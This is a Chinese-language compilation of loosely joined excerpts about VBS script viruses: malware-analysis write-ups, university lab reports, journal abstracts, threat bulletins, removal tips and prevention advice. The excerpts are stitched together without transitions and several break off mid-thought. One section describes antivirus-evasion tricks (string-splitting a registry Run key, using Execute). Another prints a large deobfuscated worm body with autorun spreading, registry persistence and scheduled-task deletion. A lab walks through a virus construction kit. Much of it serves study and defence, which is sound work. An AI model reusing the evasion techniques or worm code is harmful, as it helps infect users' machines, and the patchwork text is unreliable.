VBS脚本病毒分析及防范

对⼀个vbs脚本病毒的病毒原理分析⼀、前⾔病毒课⽼师丢给我们⼀份加密过的vbs脚本病毒的代码去尝试分析，这⾥把分析过程发出来，供⼤家参考，如果发现⽂中有什么错误或者是有啥建议，可以直接留⾔给我，谢谢！⼆、⽬录整个分析过程可以分为以下⼏个部分:0x00 准备⼯作0x01 解密部分0x02 功能分析三、分析过程0x00 准备⼯作windows xp的虚拟机(在⾃⼰的windows下也可以做)vbs的⼀些基本语法0x01 解密部分右击病毒⽂件然后编辑打开或者是直接把其后缀修改成txt直接打开都⾏，可以看到⼀⼤段密⽂，并调⽤了⼀个函数deCrypt。

暂时只看到这些，那么接着往下看吧。

拖到代码底部，发现有deCrypt了⼀次，也就是经过了两次加密，这⾥把执⾏部分注释掉，然后将解密的结果输出到⽂本⽂件中去。

另外，可以看到是⽤base64进⾏的加密的。

现在来看看解码后的结果。

发现依旧是不可阅读的代码，那就继续看看他是怎么处理的吧。

这⾥可以看到是将之前的字符串按“|dz|”划分，然后得到的是ascii码，将这些ascii码对应的字符拼接起来就好了，就得到了结果。

同样的套路将解密结果输出到⽂件中去再继续分析。

然后这次得到的结果是真正的病毒代码了。

接下来对他的功能进⾏分析。

0x02 功能分析从头开始看吧。

显⽰⼀些配置信息，包括了服务器的域名。

可以查到服务器是美国的，尝试ping了下，ping不通，可能是服务器作了设置不让⼈ping、也可能是服务器已经不⽤了、也有可能是我国的防⽕长城直接墙掉了。

然后是⼀些之后要⽤到的变量，这⾥不作过多的解释。

之后就是code start的部分了。

然后由于⾥⾯调⽤了各种函数，所以这⾥按执⾏的顺序给调⽤的函数编号，以便阅读，不然会感觉很凌乱的。

这⾥先是调⽤了instance函数。

1.instance函数给之前的⼀个参数usbspreading赋值，并对注册表进⾏写操作在执⾏完了instance函数后，会进⼊⼀个while true的死循环，不断从服务器读取命令，然后执⾏。

《网络攻击与防范》实验报告（２）单击“下一步”按钮·进人如图 4-2 所示的“禁止功能选项”设定界面.根据需要进行设定。

例如。

如果选中“禁止右键菜单”复选框.当运行了该病毒后.右击时将无法弹出快捷菜单。

图 4-2 设置“禁止功能选项”（３）单击“下一步”按钮.进入如图 4-3 所示的“病毒提示对话框”设定界面时。

根据需要设置有关开机时病毒的执行情况。

当选中“设置开机提示对话框”复选框.并设置了提示框标题和内容等后，相关信息将以对话框方式在开机时自动显示图4-3 设置开机时病毒的执行情况（４）单击“下一步”按钮，进入如图 4-4 所示的“病毒传播选项”设定界面,根据需要进行设定。

当选中“通过电子邮件进行自动传播(蠕虫)”复选框时.病毒可以向指定数量的用户发送垃圾邮件。

图4-3 设置开机时病毒的执行情况下一步夏上一步图4-4“病毒传播选项”设定界面（５）单击“下一步”按钮，进入“IE 修改选项”设定界面,根据需要进行设定。

注意.当选中“设置默认主页”复选框后，会弹出“设置主页”对话框,需要读者输人要修改的IE 浏览器主页地址(即每次打开IE 浏览器时默认打开的主页地址).如图 4-5 所示图4-5设置IE浏览器修改选项（6）单击“下一步”按钮，在出现的如图 4-6 所示的对话框中选择所生成的脚本病毒存放的位置,单击“开始制造”按钮,生成病毒文件。

图4-6选择所生成的脚本病毒存放的位置此时,可看到相应路径下,已经生成了脚本病毒文件3.2感染病毒并观察感染后的系统变化情况（１）将生成的脚本病毒文件置于虚拟机中,在其上双击使之运行。

为保证完整准确地查看病毒的感染效果.可重启已经感染了病毒的虚拟机系统。

然后，根据病毒文件生成时的设置，观察系统感染了病毒后的表现情况。

主要操作步骤如下。

（２）观察系统文件夹下的异常变化，可以发现，在 C:\ Windows,C:\Windows\system32下多了不明来源的脚本文件。

浅谈VBS脚本病毒入侵计算机的途径与防治作者：范秋生来源：《硅谷》2009年第21期[摘要]计算机病毒给世界范围内的计算机系统带了不可估量的危害,给人们留下了深刻的印象。

网络脚本病毒是计算机病毒的一种新形式,主要采用脚本语言编写,书写形式灵活,容易产生变种,它可以对系统进行操作,包括创建、修改、删除,甚至格式化硬盘,传播速度快,危害性大。

介绍VBS病毒的特点及发展现状,分析VBS病毒的原理、传播方式,并提出VBS病毒的防治策略。

[关键词]VBS病毒入侵方式病毒防治中图分类号:TP3文献标识码:A文章编号:1671-7597(2009)1110097-01一、VBS脚本病毒原理分析(一)VBS脚本病毒如何躲过杀毒软件现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户)就可能被杀。

下面谈两种方法可以简单解决:1.使用连接符"&",如:Set CURObj = CreateObject("WScript.Shell")mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"2.使用Execute函数(BY动鲨)一些杀毒软件,如瑞星,它们会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵。

彻底清楚U盘vbs
VBS病毒，英文名：Visual Basic Script，该病毒程序虽然编写简单，但破坏力大，可通过感染htm、asp、jsp、php等网页文件而传播，该病毒一般都是通过不断的自我复制来感染文件，病毒中的部分代码甚至会直接附加在其他同类程序之中，中毒后的电脑会在各个盘符下生成.vbs、autorun.exe等文件。

影响电脑的运行速度，用户会觉得电脑越来越卡。

下面我们教大家认识VBS病毒，及正确使用U盘杀毒专家查杀VBS病毒。

第一步：认识VBS病毒
电脑中中了VBS病毒，会出现如下所示的.vbs文件，
注：文件名一般不定，有时会是：pagefileconfig.vbs或prndrvr.vbsprnjobs.vbs等，主要表现形式是，以.vbs 格式存在。

该病毒自我复制速度快，如果不即时清除，会在你的电脑中不断出现该文件的复制版。

第二步：安装U盘杀毒专家（USBKiller），查杀VBS病毒
如果你的电脑中没有安装U盘杀毒专家，可以点此下载，安装后，打开主界面，点击“开始扫描”：
扫描结束后，会出现病毒的名称，路径以及相应的处理结果。

应用U盘杀毒专家查杀VBS病毒，方便快捷，不用担心会删除后下次还会出现此类vbs病毒，另外，U 盘杀毒专家具有修复U盘的功能，在查杀U盘病毒的同时，修复您的U盘系统，并免疫您的U盘，更多有关U盘杀毒专家的介绍，请点击以下网址查阅：
/。

病毒名称：.vbsMD5: 64ea1c0e8f653984f0fde25b77f8494f此病毒是VBS脚本病毒，多重加密，通过U盘进行传播感染，设置注册表自启动，每过一段时间运行，通过设置特定条件，进行其他恶意行为。

网上卸载其他恶意程序并执行。

破坏系统隐藏属性。

整理一下主主体代码：j="\":til="SY" ‘autorun.inf中的节名:btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c " ‘cmd:dfo="/u#t/":inf="\autorun.inf" ‘自启动文件set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * from win32_operatingsystem")set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schedule'")for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,falseouw=wscript.scriptfullname: 'scriptfullnamewin=fso.getspecialfolder(0)&j: 'C:\WINDOWSdir=fso.getspecialfolder(1)&j 'C:\WINDOWS\system32tmp=fso.getspecialfolder(2)&j: 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr(cnp,0):if cna="" then cna=tilwsc="wscript.exe"csc="cscript.exe"css=csc&" //nologo "wsr=rn&":createobject(""wscript.shell"").run"c=vbcrlf'-----------------inc------------------------'SY'[autorun]'open=wscript.exe .\.vbs'shell\open\command=wscript.exe .\.vbs'shell\open\default=1inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs &c&"shell\open\default=1"'-----------------inc------------------------sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr("HKCU"&rop&sf&"desktop",0)&j 'C:\Documents and Settings\Administrator\桌面\rpa="HKLM\software\"&cna&j: 'HKLM\software\QUBY-9B3768E839\fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs: 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbsfap=rr("HKCU"&rop&sf&"favorites",0)&j 'C:\Documents and Settings\Administrator\Favorites\ht=ec("ivwt?56"): 'http"\\ha=ec(":;9:7>5kw9"): '/hb=hl&"1;<<=6x"&hl&"r;" '|1;<<=6x|r;hc="0dwuEpE": '0dwuEpEhd=ec("$"+hc): '#.asp?i=he=ec("c"+hc) 'b.asp?i=rsp="HKLM\software\microsoft\windows\currentversion\"rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cnahip="HKCU"&rop&"advanced\showsuperhidden"sz=lcase(fso.getfilename(wscript.fullname))if mir=dir then sys=truefor each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:nextif instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then hb="p"+hb:lb="o" else hb="d"+hb:lb="c"for each d in dcif mir=d&j then ws.run "explorer "&d,3,false:bir=truenext'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下'如果不是就退出if bir or sys or mir=win or mir=wbe then tir=true else wscript.quitouc=rt(ouw,-1): '读取本身代码ver=gv(ouw): ‘版本验证‘如果版本验证失败,则弹出“See You”消息框,执行km函数，参数为1‘验证成功执行km函数,参数为0,km是主要感染函数if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0if sys thenif sz=wsc then pr csc,-1if pr(csc,2)=1 then wscript.quitwscript.sleep 2000if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quitif rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4‘如果读取atd项注册表为1,那么删除所有计划任务if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0‘如果在temp文件夹存在le文件，那么执行le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&lecu:er 10elsewscript.sleep 5000if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",dateif pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,falseend if3.下面主要病毒思路，其他细节请看各个函数吧>_<(1)'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下'如果不是就退出if bir or sys or mir=win or mir=wbe then tir=true else wscript.quitouc=rt(ouw,-1): '读取本身代码ver=gv(ouw): ‘进行验证(2)‘如果上面验证错误，那么回弹出“See You”,之后执行Km函数，参数为1,否则参数为0‘这里是anti，也是为了防止编译成exe文件。

XI`AN TECHNOLOGICAL UNIVERSITY实验报告实验课程名称VB脚本病毒专业：信息对抗技术班级： 130609*名：***学号： *********实验学时： 12学时指导教师：***成绩：2016 年 4 月 5 日实验目的1.了解VB脚本病毒的工作原理2.了解VB脚本病毒常见的感染目标和感染方式3.掌握编写VB脚本病毒专杀工具的一般方法实验原理一．脚本病毒概述脚本程序的执行环境需要WSH（WINDOWS SCRIPT HOST，WINDOWS脚本宿主）环境，WSH为宿主脚本创建环境。

即当脚本到达计算机时，WSH充当主机的部分，它使对象和服务可用于脚本，并提供一系列脚本执行指南。

脚本病毒的主要特点：（1）由于脚本是直接解释执行，可以直接通过自我复制的方式感染其它同类文件，并且使异常处理变得非常容易。

（2）脚本病毒通过HTML文档、EMAIL附件或其它方式，可以在很短的时间内传遍世界各地，通常是使用在邮件附件中安置病毒本体的方法，然后利用人们的好奇心，通过邮件主题或邮件内容诱骗人们点击附件中的病毒体而被感染。

（3）新型的邮件病毒邮件正文即为病毒，用户接收到带毒邮件后，即使不将邮件打开，只要将鼠标指向邮件，通过预览功能病毒也会被自动激活。

（4）病毒源码容易被获取，变种多。

（5）欺骗性强。

二．爱虫病毒分析1．病毒简介“爱虫”（VBS.LOVELETTER）病毒从2000年5月4日开始在欧洲大陆迅速传播，并向全世界蔓延。

其传播原理是通过MICROSOFT OUTLOOK将名为“LOVE-LETTER-FOR-YOU.TXT.VBS”的邮件发送给用户地址薄里所有的地址。

当病毒运行后会在系统中留下以下文件：（1）\WINDOWS\WIN32DLL.VBS；（2）\SYSTEM\MSKERNEL.VBS；（3）\SYSTEM\LOVE-LETTER_FOR_YOU.TXT.VBS。

2．病毒的杀毒步骤（1）在WINDOWS下查看进程列表中是否有WSCRIPT这个文件，如有此文件说明已经感染。

⼀、“VBS⾃动⽊马下载器11164”(VBS.AutoRun.al.11164) 威胁级别：★ 这⼀个VBS格式的页病毒，主要功能是下载⽊马程序。

它的基本原理并不复杂，但因为能够通过页挂马和AUTO传播的⽅式进⾏扩散，⼤⾯积传播的趋势较⾼。

病毒进⼊电脑后，⽴即释放病毒⽂件“.vbs”到系统盘的%WINDOWS%\system32\⽬录和%WINDOW%\system32\wbem\⽬录下。

注意，这个“.vbs”是没有名字的，这可以作为识别它的特征。

接着，病毒修改系统时间⾄2003年，致使卡巴斯基等依赖系统时间来进⾏激活和升级的杀毒软件失效。

当然，如果你的电脑中有其它软件也是依赖系统时间的，那它们也会受到影响。

与此同时，病毒会搜索连接到中毒电脑上的所有存储设备，⽐如U盘和本地硬盘，在它们的根⽬录中创建autorun.inf⽂件，实现⾃动播放功能。

这样⼀来，它就能够在各种存储设备之间⾃由地传播，不断扩⼤传染范围。

毒霸反病毒⼯程师在病毒代码中发现⼀个名为http://2**/x*W/X1.ASP的址，经检验，这是病毒作者指定的远程服务器。

病毒会悄悄连接它，下载其它⽊马⽂件，以“.exe”的名称隐藏到%WINDOWS%\system32\⽬录下运⾏，引发更多⽆法估计的损失。

⼆、“ARP蜗⽜745472”(Win32.TrojDownloader.Delf.745472) 威胁级别：★★ ARP病毒最令⼈⽆法忍受的地⽅就是它对速的影响。

整个局域中，只要有⼀台电脑中了ARP，其余电脑的速都会被拖后腿，严重时甚⾄会死机。

本则预警播报所介绍的就是这样⼀个病毒。

该病毒进⼊⽤户系统后，释放⽂件、并修改系统注册表实现⾃动运⾏。

当它成功运⾏后，会欺骗局域内所有主机和路由器，向它们发送⼤量垃圾信息，并冒充成关，让所有上的数据都必须经过中毒电脑。

在这个过程中，由于其他⽤户原来是直接通过路由器上，⽽现在转由通过病毒主机上，那么在切换的时候就会断⼀次线。

貌似有点像1KB快捷方式的病毒，请不要删除文件夹，真实的文件已被隐藏，这个病毒软件用杀毒软件无法清除，有一个专杀工具，…1KB快捷方式病毒专杀工具从网上搜索“文件夹变成1k快捷方式”，得到很多网友的解决方法，现整理如下，希望对各位有所帮助。

方法一：1、光盘启动，格式化所有盘，重装系统。

2、关闭所有驱动器的自动运行功能，这步非常重要，如果不会，百度一下吧。

3、到这个网站：/zhuansha/kill_folder.html 下载这个专杀工具可恢复所有被隐藏的内容。

方法二：1、重装系统，不动除C盘外的其它盘。

完成后不要做任何其它操作。

（如果C盘、桌面有重要文件，请先备份）2、关闭所有驱动器的自动运行功能，这步非常重要，如果不会，百度一下吧。

3、显示出所有系统文件(不会的朋友先百度下)，用点击右键打开的方法，打开其它盘，就能看到快捷方式和病毒，这些可以全部删掉。

(千万不要因为好奇或失误双击啊，不然系统就白装了)4、到这个网站：/zhuansha/kill_folder.html 下载这个专杀工具可恢复所有被隐藏的内容。

经多台电脑使用，证明此法简单可行。

方法三：不用重装系统也能彻底清除此病毒的方法，操作比较专业。

是windows PE下把所有vbs结尾的文件都删掉包括所有显示的快捷方式，病毒的问题就可以解决了！！很管用的，大家遇到这种情况可以试试！用光盘进winpe（如果硬盘上装有winpe则开机时选择进入winpe即可），搜索*.vbs（*表示任意文件名），将搜索出来的结果全部删除。

其实，这病毒是这样运行的。

通过AutoRun.inf指向*********.vbs这个脚本文件，来自动运行病毒，感染全部磁盘根目录，这些目录变成快捷方式，再指向那个vbs文件，以后要预防这种病毒就是要禁用系统的自动运行功能。

此毒中招后的一个显著特征是：硬盘各个分区原有的正常文件夹被隐藏，代之以1KB的同名文件夹.lnk文件。

脚本病毒实验【实验内容】脚本实验平台根据用户指定需求，自动生成脚本病毒代码，并在界面中呈现给用户，用户可以编辑代码，运行脚本，观察脚本运行现象，并分析脚本实现，脚本实验具体内容包括：(1)复制病毒副本到系统文件夹；(2)复制病毒副本到启动菜单；(3)禁止“运行”菜单；(4)禁止“关闭系统”菜单；(5)禁止显示桌面所有图标；(6)禁止“任务栏”和“开始”；(7)禁止“控制面板”；(8)修改“IE”默认页。

【实验原理】脚本病毒通常是JavaScript或VBScript等语言编写的恶意代码，一般带有广告性质，会修改IE首页、修改注册表等信息，对用户计算机造成破坏。

通过网页进行的传播的病毒较为典型，脚本病毒还会有如下前缀：VBS、JS(表明是何种脚本编写的)，如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。

典型的脚本病毒通过邮件方式进行传播，如图2.4.1-1所示的代码为病毒通过向Outlook 中的地址簿中联系人地址发送邮件，从而将病毒代码以附件的形式广泛传播到互联网其它主机。

图2.4.1-1【实验环境】Windows实验台【实验步骤】打开Windows实验台，点击桌面“病毒实验”，选择“脚本病毒实验”，进入其实施面板，如图2.4.1-2所示。

图2.4.1-2一、脚本病毒代码分析和查看分别选择相应的脚本文件，学生用户即可查看脚本病毒代码。

在界面左侧功能选择区选择实验名称，用户在界面右侧将会看到该脚本病毒的全部代码。

如图2.4.1-3所示。

图2.4.1-3学生用户如需要编辑脚本病毒代码，用户在界面右侧将会看到该脚本病毒的全部代码，在此基础上编辑代码，将会生成用户自定义的脚本病毒，点击“保存脚本”按钮将把编辑好的脚本文件永久保存，如果编辑过程出现错误或者异常，点击“重置脚本”将恢复最初的脚本代码。

实验进行前，要先点击“初始化病毒工具”按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具”按钮，对工具重新进行初始化，以便实验顺利进行。

VBS脚本病毒对网络的危害摘要：本文介绍了目前网络病毒对电子商务活动的巨大危害，并从已经威胁到电子商务活动的这些网络病毒中，针对VBS脚本病毒进行了详细的分析和研究，对其源代码的编程思想进行了详细分析和讲解，最后对从事电子商务的用户提供了防范和清除VBS脚本病毒的相应方案。

Danger to the network of script virus of VBSThis text has introduced the enormous danger to the electronic commercial activity of virus of the network at present, and from already threatenning it in these network virus of the electronic commercial activity, carry on detailed analysis and study to VBS script virus , go on in detail analysing and explaining to programming thought of source code its, offered and took precautions against and removed the corresponding scheme of the script virus of VBS to users engaged in e-commerce finally.关键词：网络的安全性 VBS脚本病毒VBS代码分析引言：计算机与网络技术使当今世界进入信息经济时代，电子商务正以人们始料不及的速度迅速兴起，逐渐改变社会经济生活的各个方面。

然而在电子商务的运作中我们也面临了许多的问题，其中最重要的它的安全问题，在电子商务条件下，企业的经营的安全都离不开计算机网络和计算机本身，安全威胁变得多元化。

实验八脚本病毒一、实验目的1．了解脚本病毒的工作原理；2．观察病毒感染现象并手工查杀病毒。

二、实验环境1．本练习由单人为一组进行。

2．首先使用“快照X”恢复Windows系统环境。

三、实验原理恶意脚本是指一切以制造危害或者损害系统功能为目的而从软件系统中增加、改变或删除的任何脚本。

VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。

2000年5月4日，在欧美爆发了“爱虫”网络蠕虫病毒，造成了比“美丽莎”病毒破坏性更大的经济损失。

这个病毒是通过Microsoft Outlook电子邮件系统传播的，邮件的主题为“I LOVE YOU”，并包含一个附件。

一旦在Microsoft Outlook里打开这个邮件，系统就会自动复制并向地址簿中的所有邮件电址发送这个病毒。

这个病毒属于vbs脚本病毒，可以通过html，irc，email进行大量的传播。

svir.vbs病毒具备“爱虫”病毒的部分功能，是以“爱虫”病毒为基础，减弱其破坏性，并将感染范围控制到一定的范围内的模拟病毒。

四、实验步骤1．网页恶意代码(1) 恶意网页1新建记事本HostilityCode1.txt，在文本中编写如下代码，保存代码并退出，更改扩展名.txt为.html，双击HostilityCode1.html页面，观察页面效果。

（如果打开页面时出现安全警告，单击右键选择“允许阻止的内容”）<HTML><BODY><SCRIPT>var color = new Arraycolor[1]= " black"color[2]= " white"for(x=0;x<3;x++){ document.bgColor = color[x]if(x==2){ x=0}}</SCRIPT></BODY></HTML>页面效果：。

VBS.Runauto脚本病毒是我们俗称的U盘病毒的一种，Symantec公司给其定位为蠕虫（Worm）病毒，虽然危害性远不如一些恶性病毒，但常常会严重影响用户正常使用计算机。

最近一位同事的笔记本遭遇了这个病毒，正好这学期在给计算机专业的同学们上VBscript 于是顺便分析了一下。

首先从染病毒的计算机上提取下来病毒样本，由于是临时发现的，也没有特别准备，就用winrar压缩后保存。

在实验机器上打开病毒样本的压缩文件，我的Symantec 11立即报警，并把病毒删除了。

所以必须禁用杀毒软件或者设置一个“例外区域”用于分析病毒，于是在桌面上新建了“evA”文件夹，并将之设置为防病毒例外文件夹，这下病毒样本安静的躺在里面了。

脚本病毒是解释型程序，因此我们不需要什么特别的反编译工具就能查看源代码了。

虽然Windows的记事本足够用了，但是我还是喜欢使用UltraEdit。

使用打开UltraEdit打开病毒文件如图1，注意，为了防止误触发病毒，这里首先将vbs扩展名修改为txt。

图1 病毒脚本打开病毒脚本，大家可以发现代码的可读性非常差，大小写字母杂乱的排列，并且还有很多无法理解的符号串。

其实这是病毒为了保存自己而“想”出来的“保护伞”。

病毒代码大小写问题可以在UE（以后UltraEdit简称）中选择文本后，使用Ctrl+F5直接转换成小写字母。

对于类似密码的“00c2%0033%……”的字符串相对来说比较麻烦点。

从病毒代码中可以发现只要出现“乱码”的地方都会有“STrREVeRSE”和“unEscaPE”函数的调用，其中“unescape”是vbscript标准函数，作用就是将经过escape函数编码过的字符串进行反编码。

这里需要说明一下，由于Web中的Html对于有些符号是进行保留使用的，比如“<”和“>”符号，如果需要对这些符号进行显示那么需要对他们进行html编码，所有空格、标点、重音符号以及其他非ASCII 字符都用%xx 编码代替，其中xx 等于表示该字符的十六进制数。

VBS脚本病毒特点及如何防范3（转）5．Vbs病毒⽣产机的原理介绍 所谓病毒⽣产机就是指可以直接根据⽤户的选择产⽣病毒源代码的软件。

在很多⼈看来这或许不可思议，其实对脚本病毒⽽⾔它的实现⾮常简单。

脚本语⾔是解释执⾏的、不需要编译，程序中不需要什么校验和定位，每条语句之间分隔得⽐较清楚。

这样，先将病毒功能做成很多单独的模块，在⽤户做出病毒功能选择后，⽣产机只需要将相应的功能模块拼凑起来，最后再作相应的代码替换和优化即可。

由于篇幅关系和其他原因，这⾥不作详细介绍。

三、如何防范vbs脚本病毒 1．如何从样本中提取（加密）脚本病毒 对于没有加密的脚本病毒，我们可以直接从病毒样本中找出来，现在介绍⼀下如何从病毒样本中提取加密VBS脚本病毒，这⾥我们以新欢乐时光为例。

⽤JediEdit打开folder.htt。

我们发现这个⽂件总共才93⾏，第⼀⾏，⼏⾏注释后，以开始，节尾。

相信每个⼈都知道这是个什么类型的⽂件吧！ 第87⾏到91⾏，是如下语句： 87： 第87和91⾏不⽤解释了，第88⾏是⼀个字符串的赋值，很明显这是被加密过的病毒代码。

看看89⾏最后的⼀段代码ThisText = ThisText & TempChar，再加上下⾯那⼀⾏，我们肯定能够猜到ThisText⾥⾯放的是病毒解密代码（熟悉vbs的兄弟当然也可以分析⼀下这段解密代码，too simple!就算完全不看代码也应该可以看得出来的)。

第90⾏是执⾏刚才ThisText中的那段代码（经过解密处理后的代码）。

那么，下⼀步该怎么做呢？很简单，我们只要在病毒代码解密之后，将ThisText的内容输出到⼀个⽂本⽂件就可以解决了。

由于上⾯⼏⾏是vbscript,于是我创建了如下⼀个.txt⽂件： ⾸先，copy第88、89两⾏到刚才建⽴的.txt⽂件，当然如果你愿意看看新欢乐时光的执⾏效果，你也可以在最后输⼊第90⾏。

然后在下⾯⼀⾏输⼊创建⽂件和将ThisText写⼊⽂件vbs代码，整个⽂件如下所⽰： ExeString = "Afi...’ 第88⾏代码 Execute("Dim KeyAr... ’ 第89⾏代码 set fso=createobject("scripting.filesystemobject") ’ 创建⼀个⽂件系统对象 set virusfile=fso.createtextfile("resource.log",true) ’ 创建⼀个新⽂件resource.log， ⽤以存放解密后的病毒代码 virusfile.writeline(ThisText) ’ 将解密后的代码写⼊resource.log OK！就这么简单，保存⽂件，将该⽂件后缀名.txt改为.vbs(.vbe也可以)，双击，你会发现该⽂件⽬录下多了⼀个⽂件resource.log，打开这个⽂件，怎么样？是不是“新欢乐时光”的源代码啊！ 2．vbs脚本病毒的弱点 vbs脚本病毒由于其编写语⾔为脚本，因⽽它不会像PE⽂件那样⽅便灵活，它的运⾏是需要条件的（不过这种条件默认情况下就具备了）。

VBS脚本病毒分析及防范摘要:VBScript脚本病毒利用Internet的开放性和各种软件的漏洞对计算机系统进行攻击,常常造成世界范围内的大面积网络瘫痪。

VBS脚本病毒呈现出一些新的特点:通过各种网络方式进行传播,传播范围广,破坏性强。

关键词:VBS 脚本病毒防范一、VBS病毒产生随着计算机技术的发展.计算机病毒技术亦日益提高。

从dos系统到windows 系统.从底层的汇编语言到高层的面向对象语言,无不留其发展的痕迹。

尤其是网络的广泛应用。

以网络为媒介的病毒技术迅速的发展起来。

1998年11月.当一种染毒的VBS文件利用Web页在网络上进行传播的时候,一种全新病毒的概念就诞生了。

病毒的制造者们针对微软的窗口操作系统和办公软件。

通过E-mail将病毒传播到远程主机上。

这种利用VBS脚本语言编写的病毒称之为VBS病毒,VBS 病毒有很多种,较著名的是爱虫病毒和新欢乐时光病毒。

二、VBS病毒的机理顾名思义,VBS病毒是用VBS cirpt编写而成,该脚本语言功能非常强大。

它们利用Windows系统的开放性特点。

通过调用一些现成的Windows对象、组件。

可以直接对文件系统、注册表等进行控制。

功能非常强大。

两个最典型的windows 对象就是WSH和FSO。

WSH全称“WindowscSripitngHost”。

其通用的中文译名为“Windows脚本宿主”。

它是内嵌于windows系统中的脚本语言执行环境。

此概念在iwndows98系统中提出。

类似于DOS下的批处理命令。

它架构在ActiveX 之上。

充当ActiveX的脚本引擎控制器,为各种脚本语言指令的执行提供了一个公共的基础。

任何以js、vbs为后缀名的文件都可以在windows下通过词用Wscript.exe获得执行。

FSO全称文件系统对象(FILE SYSTEM OBJECT),该对象模型通过object.method语法,将对文件及文件夹操作通过词用对象本身的属性直接实现。

脚本病毒防范措施脚本病毒是一种常见的计算机病毒类型，它们以脚本语言编写，可以在受感染的计算机上自动执行恶意操作。

脚本病毒的危害包括但不限于数据丢失、系统崩溃、信息泄漏等。

为了保护计算机免受脚本病毒的威胁，我们需要采取一些防范措施。

1. 定期更新软件和操作系统定期更新操作系统和软件是防范脚本病毒的重要措施之一。

脚本病毒往往利用操作系统和软件的漏洞来入侵计算机，因此及时更新可以修复这些漏洞，减少被感染的风险。

建议启用自动更新功能，确保系统和软件始终处于最新的安全状态。

2. 使用正版和可信的软件使用正版和可信的软件是防范脚本病毒的另一项重要措施。

正版软件通常会经过严格的安全测试，而且厂商会定期提供安全补丁和更新，能够有效地防范各种病毒攻击。

避免下载和使用来路不明的软件，特别是那些通过非官方渠道获取的软件，以免带来安全风险。

3. 谨慎打开邮件和附件脚本病毒经常通过电子邮件和附件进行传播，因此要谨慎打开邮件和附件是很重要的。

如果接收到来自陌生发件人的邮件，尤其是伴随着可疑附件的邮件，最好不要随意打开。

在打开附件之前，可以使用杀毒软件对其进行扫描，确保其安全性。

4. 安装可靠的杀毒软件安装可靠的杀毒软件也是防范脚本病毒的重要措施之一。

杀毒软件能够及时发现和清除潜在的病毒威胁，保护计算机免受感染。

建议选择知名的杀毒软件，并经常更新其病毒库，以确保其能够识别最新的病毒变种。

5. 启用防火墙防火墙可以监控和控制网络通信，阻止潜在的脚本病毒入侵。

启用计算机上的防火墙可以阻止未经授权的访问，减少脚本病毒入侵的风险。

如果操作系统本身没有防火墙功能，可以考虑安装第三方防火墙软件来增强计算机的安全性。

6. 注意安全浏览安全浏览是防范脚本病毒的重要环节。

在浏览网页时，要注意不要点击可疑的链接，尤其是来自不可信的网站。

此外，禁止自动执行脚本也是一种有效的防范措施。

可以根据浏览器的设置，选择禁用或限制网页中的自动脚本执行，以减少脚本病毒的入侵风险。